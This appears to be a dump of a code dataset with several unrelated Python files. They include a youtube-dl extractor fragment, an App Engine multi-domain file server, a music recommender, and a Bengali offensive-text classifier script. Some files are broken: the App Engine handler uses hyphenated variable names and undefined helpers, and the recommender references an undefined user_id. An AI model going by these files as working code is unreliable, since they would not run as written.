# https://github.com/jwplayer/jwplayer/blob/v7.4.3/src/js/playlist/item.js#L29-L35
if 'sources' not in video_data:
video_data['sources'] = [video_data]
this_video_id = video_id or video_data['mediaid']
formats = []
for source in video_data['sources']:
source_url = self._proto_relative_url(source['file'])
if base_url:
source_url = compat_urlparse.urljoin(base_url, source_url)
source_type = source.get('type') or ''
ext = mimetype2ext(source_type) or determine_ext(source_url)
if source_type == 'hls' or ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
source_url, this_video_id, 'mp4', 'm3u8_native', m3u8_id=m3u8_id, fatal=False))
elif ext == 'mpd':
formats.extend(self._extract_mpd_formats(
source_url, this_video_id, mpd_id=mpd_id, fatal=False))
# https://github.com/jwplayer/jwplayer/blob/master/src/js/providers/default.js#L67
elif source_type.startswith('audio') or ext in ('oga', 'aac', 'mp3', 'mpeg', 'vorbis'):
formats.append({
'url': source_url,
'vcodec': 'none',
'ext': ext,
})
else:
height = int_or_none(source.get('height'))
if height is None:
# Often no height is provided but there is a label in
# format like 1080p.
height = int_or_none(self._search_regex(
r'^(\d{3,})[pP]$', source.get('label') or '',
'height', default=None))
a_format = {
'url': source_url,
'width': int_or_none(source.get('width')),
'height': height,
'ext': ext,
}
if source_url.startswith('rtmp'):
a_format['ext'] = 'flv'
# See com/longtailvideo/jwplayer/media/RTMPMediaProvider.as
# of jwplayer.flash.swf
rtmp_url_parts = re.split(
r'((?:mp4|mp3|flv):)', source_url, 1)
if len(rtmp_url_parts) == 3:
rtmp_url, prefix, play_path = rtmp_url_parts
a_format.update({
'url': rtmp_url,
'play_path': prefix + play_path,
})
if rtmp_params:
a_format.update(rtmp_params)
formats.append(a_format)
self._sort_formats(formats)
subtitles = {}
tracks = video_data.get('tracks')
if tracks and isinstance(tracks, list):
for track in tracks:
if track.get('kind') != 'captions':
continue
track_url = urljoin(base_url, track.get('file'))
if not track_url:
continue
subtitles.setdefault(track.get('label') or 'en', []).append({
'url': self._proto_relative_url(track_url)
})
entries.append({
'id': this_video_id,
'title': video_data['title'] if require_title else video_data.get('title'),
'description': video_data.get('description'),
'thumbnail': self._proto_relative_url(video_data.get('image')),
'timestamp': int_or_none(video_data.get('pubdate')),
'duration': float_or_none(jwplayer_data.get('duration') or video_data.get('duration')),
'subtitles': subtitles,
'formats': formats,
})
if len(entries) == 1:
return entries[0]
else:
return self.playlist_result(entries)
def _live_title(self, name):
""" Generate the title for a live video """
now = datetime.datetime.now()
now_str = now.strftime('%Y-%m-%d %H:%M')
return name + ' ' + now_str
def _int(self, v, name, fatal=False, **kwargs):
res = int_or_none(v, **kwargs)
if 'get_attr' in kwargs:
print(getattr(v, kwargs['get_attr']))
if res is None:
msg = 'Failed to extract %s: Could not parse value %r' % (name, v)
if fatal:
raise ExtractorError(msg)
else:
self._downloader.report_warning(msg)
return res
def _float(self, v, name, fatal=False, **kwargs):
res = float_or_none(v, **kwargs)
if res is None:
msg = 'Failed to extract %s: Could not parse value %r' % (name, v)
if fatal:
raise ExtractorError(msg)
else:
self._downloader.report_warning(msg)
return res
def _set_cookie(self, domain, name, value, expire_time=None):
cookie = compat_cookiejar.Cookie(
0, name, value, None, None, domain, None,
None, '/', True, False, expire_time, '', None, None, None)
self._downloader.cookiejar.set_cookie(cookie)
def _get_cookies(self, url):
""" Return a compat_cookies.SimpleCookie with the cookies for the url """
req = sanitized_Request(url)
self._downloader.cookiejar.add_cookie_header(req)
return compat_cookies.SimpleCookie(req.get_header('Cookie'))
def get_testcases(self, include_onlymatching=False):
t = getattr(self, '_TEST', None)
if t:
assert not hasattr(self, '_TESTS'), \
'%s has _TEST and _TESTS' % type(self).__name__
tests = [t]
else:
tests = getattr(self, '_TESTS', [])
for t in tests:
if not include_onlymatching and t.get('only_matching', False):
continue
t['name'] = type(self).__name__[:-len('IE')]
yield t
def is_suitable(self, age_limit):
""" Test whether the extractor is generally suitable for the given
age limit (i.e. pornographic sites are not, all others usually are) """
any_restricted = False
for tc in self.get_testcases(include_onlymatching=False):
if tc.get('playlist', []):
tc = tc['playlist'][0]
is_restricted = age_restricted(
tc.get('info_dict', {}).get('age_limit'), age_limit)
if not is_restricted:
return True
any_restricted = any_restricted or is_restricted
return not any_restricted
def extract_subtitles(self, *args, **kwargs):
if (self._downloader.params.get('writesubtitles', False) or
self._downloader.params.get('listsubtitles')):
return self._get_subtitles(*args, **kwargs)
return {}
def _get_subtitles(self, *args, **kwargs):
raise NotImplementedError('This method must be implemented by subclasses')
@staticmethod
def _merge_subtitle_items(subtitle_list1, subtitle_list2):
""" Merge subtitle items for one language. Items with duplicated URLs
will be dropped. """
list1_urls = set([item['url'] for item in subtitle_list1])
ret = list(subtitle_list1)
ret.extend([item for item in subtitle_list2 if item['url'] not in list1_urls])
return ret
@classmethod
def _merge_subtitles(cls, subtitle_dict1, subtitle_dict2):
""" Merge two subtitle dictionaries, language by language. """
ret = dict(subtitle_dict1)
for lang in subtitle_dict2:
ret[lang] = cls._merge_subtitle_items(subtitle_dict1.get(lang, []), subtitle_dict2[lang])
return ret
def extract_automatic_captions(self, *args, **kwargs):
if (self._downloader.params.get('writeautomaticsub', False) or
self._downloader.params.get('listsubtitles')):
return self._get_automatic_captions(*args, **kwargs)
return {}
def _get_automatic_captions(self, *args, **kwargs):
raise NotImplementedError('This method must be implemented by subclasses')
def mark_watched(self, *args, **kwargs):
if (self._downloader.params.get('mark_watched', False) and
(self._get_login_info()[0] is not None or
self._downloader.params.get('cookiefile') is not None)):
self._mark_watched(*args, **kwargs)
def _mark_watched(self, *args, **kwargs):
raise NotImplementedError('This method must be implemented by subclasses')
def geo_verification_headers(self):
headers = {}
geo_verification_proxy = self._downloader.params.get('geo_verification_proxy')
if geo_verification_proxy:
headers['Ytdl-request-proxy'] = geo_verification_proxy
return headers
def _generic_id(self, url):
return compat_urllib_parse_unquote(os.path.splitext(url.rstrip('/').split('/')[-1])[0])
def _generic_title(self, url):
return compat_urllib_parse_unquote(os.path.splitext(url_basename(url))[0])
class SearchInfoExtractor(InfoExtractor):
"""
Base class for paged search queries extractors.
They accept URLs in the format _SEARCH_KEY(|all|[0-9]):{query}
Instances should define _SEARCH_KEY and _MAX_RESULTS.
"""
@classmethod
def _make_valid_url(cls):
return r'%s(?P<prefix>|[1-9][0-9]*|all):(?P<query>[\s\S]+)' % cls._SEARCH_KEY
@classmethod
def suitable(cls, url):
return re.match(cls._make_valid_url(), url) is not None
def _real_extract(self, query):
mobj = re.match(self._make_valid_url(), query)
if mobj is None:
raise ExtractorError('Invalid search query "%s"' % query)
prefix = mobj.group('prefix')
query = mobj.group('query')
if prefix == '':
return self._get_n_results(query, 1)
elif prefix == 'all':
return self._get_n_results(query, self._MAX_RESULTS)
else:
n = int(prefix)
if n <= 0:
raise ExtractorError('invalid download number %s for query "%s"' % (n, query))
elif n > self._MAX_RESULTS:
self._downloader.report_warning('%s returns max %i results (you requested %i)' % (self._SEARCH_KEY, self._MAX_RESULTS, n))
n = self._MAX_RESULTS
return self._get_n_results(query, n)
def _get_n_results(self, query, n):
"""Get a specified number of results for a query"""
raise NotImplementedError('This method must be implemented by subclasses')
@property
def SEARCH_KEY(self):
return self._SEARCH_KEY
| [
"[email protected]"
] | |
7439984021e52c258bfe0ac54ba406557a88457c | e3403b060d5dce65c9b1266286696347f385ceb7 | /main.py | 73d91b808af8f684f50a2ecdbad0d59c488bd6da | [] | no_license | NoxHarmonium/multi-domain-appengine | c93597bceba2fc248eb65bc29f4ee6d5eceb6626 | 5922c600d52213f93bd679604ac096180c441cb8 | refs/heads/master | 2021-03-12T22:53:58.961324 | 2013-04-27T08:25:08 | 2013-04-27T08:25:08 | 9,670,566 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,216 | py | #
# Main Handler File
#
# Python imports
import os
import webapp2
from webapp2_extras import routes
from google.appengine.ext.webapp import template
import mimetypes
import logging
import time
from datetime import date
from datetime import timedelta
# User code imports
import utils
# Constants
subpath = 'html'
cache-control = 'Public, max-age=31536000'
expire-length = timedelta(days=365)
class MainHandler(webapp2.RequestHandler):
def get (self,path):
# Initialise the mime type utility
if not(mimetypes.inited):
mimetypes.init()
# No path defaults to home page
if path is None or path == '/' or path == '':
path = 'index.html'
# Get the file location on the server
path = os.path.join(os.path.dirname (__file__), self.request.route.name,subpath, path)
# Set response headers
self.response.headers['Content-Type'] = mimetypes.guess_type(path)[0];
self.response.headers['Cache-Control'] = cache-control;
self.response.headers['Expires'] = formatDate(date.today() + expire-length)
lastUpdateTime = None
# If there is an 'If-Modified-Since' header, use it to see if the
# the file has changed since the client last downloaded it.
try:
lastUpdateTime = self.request.headers['If-Modified-Since'];
except:
pass
if not (lastUpdateTime is None or lastUpdateTime == ''):
lastUpdateTime = parseDate(lastUpdateTime)
fileModTime = os.stat(path).st_mtime
if lastUpdateTime < fileModTime:
# Status code 304 means the file hasn't changed (send no data)
self.response.set_status(304)
else:
# Read the server file
out = open(path,'rb').read()
# Write the server file out to the client
self.response.out.write (out)
app = webapp2.WSGIApplication([
routes.DomainRoute('www.exampledomain1.com', [
webapp2.Route('/<path:.*?>', handler=MainHandler, name='www.exampledomain1.com'),
]),
routes.DomainRoute('www.exampledomain2.com', [
webapp2.Route('/<path:.*?>', handler=MainHandler, name='www.exampledomain2.com'),
]),
# localhost defaults to first domain
routes.DomainRoute('localhost', [
webapp2.Route('/<path:.*?>', handler=MainHandler, name='www.exampledomain1.com'),
])
], debug=True)
| [
"[email protected]"
] | |
bf7fb37e08aca3711b940fd4a7d4b95a285874fe | 3345a3e7a11f9e547553da06293c2684f7654205 | /music/truncate(1).py | 2fe2c6cc02988606b77a82463abbbc3c66135720 | [] | no_license | abhilekh703/Music-Recommendation | c04c73937d15f9db8652922bacaaa0e38d94e807 | 45ff061d5290eb77c7963546170aae75eec74b0d | refs/heads/master | 2021-01-20T05:47:10.499243 | 2017-08-26T08:10:38 | 2017-08-26T08:10:38 | 101,472,252 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,771 | py | from numpy import genfromtxt
import numpy as np
original_filename = "train_triples.txt"
trunc_filename = "truncated_data.txt"
def similarity(u,v):
# print "Calculating sim between " + str(u) + " and " + str(v),
numerator = float(np.inner(u,v))
norm_u = np.linalg.norm(u)
norm_v = np.linalg.norm(v)
denominator = norm_u * norm_v
# print numerator, denominator
# print " = " + str(numerator/denominator)
return numerator/denominator
def score(user_index,song_index,data):
u = data[user_index]
u_avg = np.mean(u)
numerator = 0
denominator = 0
# print 'similarity = '
for u1 in data:
u1_avg = np.mean(u1)
sim = similarity(u,u1)
# print sim,
numerator += sim * (u[song_index]-u1_avg)
denominator += abs(sim)
return u_avg + (numerator/denominator)
def prediction(user_index,data,k=16):
score_list = []
print "Constructing score list...",
for i in xrange(data.shape[1]):
s = score(user_index, i, data)
score_list.append((s, i))
score_list.sort()
print "Done"
recommendations = score_list[data.shape[1]-k:data.shape[1]]
rec_songs = [y for (x,y) in recommendations]
# print score_list
return rec_songs
def normalizeMatrix(data_matrix):
num_rows = data_matrix.shape[0]
num__cols = data_matrix.shape[1]
data_matrix_normalized = [[0]*num__cols] * num_rows
#normalizing the data
for i in xrange(num_rows):
data_matrix_normalized[i] = data_matrix[i] / float(np.amax(data_matrix[i]))
return np.asarray(data_matrix_normalized)
if __name__ == '__main__':
data = genfromtxt("newmatrix.csv",delimiter=",")
num_users = data.shape[0]
data_normal = normalizeMatrix(data)
u = user_id
print prediction(u,data_normal)
print num_users
print data.shape[1]
#user_music = genfromtxt('matrix.csv', delimiter=',')
#print user_music
| [
"[email protected]"
] | |
a59f67af7c6e66b884de632bed8d46528b4d7eb6 | a503267bd227c9f1e98d59dac87e269cae9135fc | /ProgramaHBSIS/Cadastro.py | 12f72f44bcf61309365f62fce5dd7ce27ed3b603 | [] | no_license | JuniorCardoso-py/PythonCourse | 6d4316f6467c9b638548a5fa562245818dc0694b | 8c608bcde6b005372a431544c0955ffcd95f2a05 | refs/heads/master | 2023-03-23T16:42:20.477303 | 2020-02-27T14:10:15 | 2020-02-27T14:10:15 | 223,630,556 | 1 | 0 | null | 2021-03-20T02:49:09 | 2019-11-23T17:54:28 | Python | UTF-8 | Python | false | false | 77 | py | def cadastro():
n1 = input('\nDigite a opção desejada: ')
return n1 | [
"[email protected]"
] | |
147c8df2d553cdf7a94eb4d84d3569c0ecc0be56 | f8366d126fb6bdf1be73263876ac8b543f998a8d | /examples/bengali/bengali_deepoffense.py | 5d0a861414d7e275160a19ef1abb1956892750d1 | [] | no_license | prajwal2495/DeepOffense | 45335ad398bdc90ab9601fb4bff9a2520f910b97 | f2cac7f7bd8ff3688f0577bcaeeedfbad0d20b62 | refs/heads/master | 2023-01-10T00:02:53.905109 | 2020-11-06T23:13:43 | 2020-11-06T23:13:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,542 | py | import os
import shutil
import time
import csv
import numpy as np
import pandas as pd
import sklearn
import torch
from sklearn.model_selection import train_test_split
from deepoffense.classification import ClassificationModel
from deepoffense.language_modeling.language_modeling_model import LanguageModelingModel
from examples.common.evaluation import macro_f1, weighted_f1
from examples.common.label_converter import decode, encode
from examples.bengali.bengali_deepoffense_config import LANGUAGE_FINETUNE, TEMP_DIRECTORY, SUBMISSION_FOLDER, \
MODEL_TYPE, MODEL_NAME, language_modeling_args, args, SEED, RESULT_FILE
from examples.common.print_stat import print_information, print_information_multi_class
if not os.path.exists(TEMP_DIRECTORY): os.makedirs(TEMP_DIRECTORY)
if not os.path.exists(os.path.join(TEMP_DIRECTORY, SUBMISSION_FOLDER)): os.makedirs(
os.path.join(TEMP_DIRECTORY, SUBMISSION_FOLDER))
train = pd.read_csv('examples/bengali/data/trac2_iben_train.csv', sep=",", encoding="utf-8-sig", engine="python")
train = train.rename(columns={'Text': 'text', 'Sub-task A': 'labels'}).dropna()
train = train[['text', 'labels']]
dev = pd.read_csv('examples/bengali/data/trac2_iben_dev.csv', sep=",", encoding="utf-8-sig", engine="python")
dev = dev.rename(columns={'Text': 'text', 'Sub-task A': 'labels'}).dropna()
dev = dev[['text', 'labels']]
test = pd.read_csv('examples/bengali/data/trac2_iben_test.csv', sep=",", encoding="utf-8-sig", engine="python")
test = test.rename(columns={'Text': 'text', 'Sub-task A': 'labels'}).dropna()
test = test[['text', 'labels']]
train = pd.concat([train, dev])
if LANGUAGE_FINETUNE:
train_list = train['text'].tolist()
test_list = test['text'].tolist()
complete_list = train_list + test_list
lm_train = complete_list[0: int(len(complete_list)*0.8)]
lm_test = complete_list[-int(len(complete_list)*0.2):]
with open(os.path.join(TEMP_DIRECTORY, "lm_train.txt"), 'w') as f:
for item in lm_train:
f.write("%s\n" % item)
with open(os.path.join(TEMP_DIRECTORY, "lm_test.txt"), 'w') as f:
for item in lm_test:
f.write("%s\n" % item)
model = LanguageModelingModel(MODEL_TYPE, MODEL_NAME, args=language_modeling_args)
model.train_model(os.path.join(TEMP_DIRECTORY, "lm_train.txt"), eval_file=os.path.join(TEMP_DIRECTORY, "lm_test.txt"))
MODEL_NAME = language_modeling_args["best_model_dir"]
# Train the model
print("Started Training")
train['labels'] = encode(train["labels"])
test['labels'] = encode(test["labels"])
test_sentences = test['text'].tolist()
test_preds = np.zeros((len(test), args["n_fold"]))
if args["evaluate_during_training"]:
for i in range(args["n_fold"]):
if os.path.exists(args['output_dir']) and os.path.isdir(args['output_dir']):
shutil.rmtree(args['output_dir'])
print("Started Fold {}".format(i))
model = ClassificationModel(MODEL_TYPE, MODEL_NAME, args=args, num_labels=3,
use_cuda=torch.cuda.is_available()) # You can set class weights by using the optional weight argument
train_df, eval_df = train_test_split(train, test_size=0.1, random_state=SEED * i)
model.train_model(train_df, eval_df=eval_df, macro_f1=macro_f1, weighted_f1=weighted_f1, accuracy=sklearn.metrics.accuracy_score)
model = ClassificationModel(MODEL_TYPE, args["best_model_dir"], args=args,
use_cuda=torch.cuda.is_available())
predictions, raw_outputs = model.predict(test_sentences)
test_preds[:, i] = predictions
print("Completed Fold {}".format(i))
# select majority class of each instance (row)
final_predictions = []
for row in test_preds:
row = row.tolist()
final_predictions.append(int(max(set(row), key=row.count)))
test['predictions'] = final_predictions
else:
model = ClassificationModel(MODEL_TYPE, MODEL_NAME, args=args, num_labels=3,
use_cuda=torch.cuda.is_available())
model.train_model(train, macro_f1=macro_f1, weighted_f1=weighted_f1, accuracy=sklearn.metrics.accuracy_score)
predictions, raw_outputs = model.predict(test_sentences)
test['predictions'] = predictions
test['predictions'] = decode(test['predictions'])
test['labels'] = decode(test['labels'])
time.sleep(5)
print_information_multi_class(test, "predictions", "labels")
test.to_csv(os.path.join(TEMP_DIRECTORY, RESULT_FILE), header=True, sep='\t', index=False, encoding='utf-8')
| [
"[email protected]"
] | |
8f47991f3ec2e4d47399e69353ada822a5c8e29f | 48e835e6f176a8ac9ae3ca718e8922891f1e5a18 | /src/main/python/june-2017/read_select_classes.py | 83cfb6b4fd5d29cacc2acc6ccd907b0aab582509 | [] | no_license | STAMP-project/dspot-experiments | f2c7a639d6616ae0adfc491b4cb4eefcb83d04e5 | 121487e65cdce6988081b67f21bbc6731354a47f | refs/heads/master | 2023-02-07T14:40:12.919811 | 2019-11-06T07:17:09 | 2019-11-06T07:17:09 | 75,710,758 | 14 | 19 | null | 2023-01-26T23:57:41 | 2016-12-06T08:27:42 | null | UTF-8 | Python | false | false | 737 | py | import sys
import json
def read(projects):
with open("dataset/selected_classes.json") as data_file:
classes = json.load(data_file)
top = []
worst = []
for project in projects:
top.append(classes[project]["top_1"])
top.append(classes[project]["top_2"])
worst.append(classes[project]["worst_1"])
worst.append(classes[project]["worst_2"])
return top, worst
if __name__ == '__main__':
if len(sys.argv) > 1:
projects = sys.argv[1:]
else:
projects = ["javapoet", "mybatis", "traccar", "stream-lib", "mustache.java", "twilio-java", "jsoup",
"protostuff",
"logback", "retrofit"]
print read(projects=projects)
| [
"[email protected]"
] | |
1882b184748ee446bd085cf2194daea584aa6a8b | bfa5cf2640d41588bede186eaf8c6e281fd00b51 | /setup.py | edff89059a5e3094aebcb6e6409df31342c0a8f9 | [
"MIT"
] | permissive | artiya4u/huntertray | e796661eb54be067a8099afbb911de2088cb68aa | 492e0da06f89a393e3c68ff713df11cac23b1c15 | refs/heads/master | 2020-04-28T18:09:40.666263 | 2019-06-22T08:52:48 | 2019-06-22T08:52:48 | 175,469,839 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 859 | py | import sys
from setuptools import setup
from setuptools import find_packages
requirements = ['requests']
if sys.version_info < (2, 7):
requirements.append('argparse')
setup(name='huntertray',
version='0.0.3',
description='ProductHunt in your System Tray',
long_description='ProductHunt in your System Tray inspired by HackerTray',
keywords='ProductHunt PH tray system tray icon huntertray',
url='https://github.com/artiya4u/huntertray',
author='Artiya Thinkumpang',
author_email='[email protected]',
license='MIT',
packages=find_packages(),
package_data={
'huntertray.data': ['hunter-tray.png']
},
install_requires=[
'requests>=2.2.1'
],
entry_points={
'console_scripts': ['huntertray = huntertray:main'],
},
zip_safe=False)
| [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.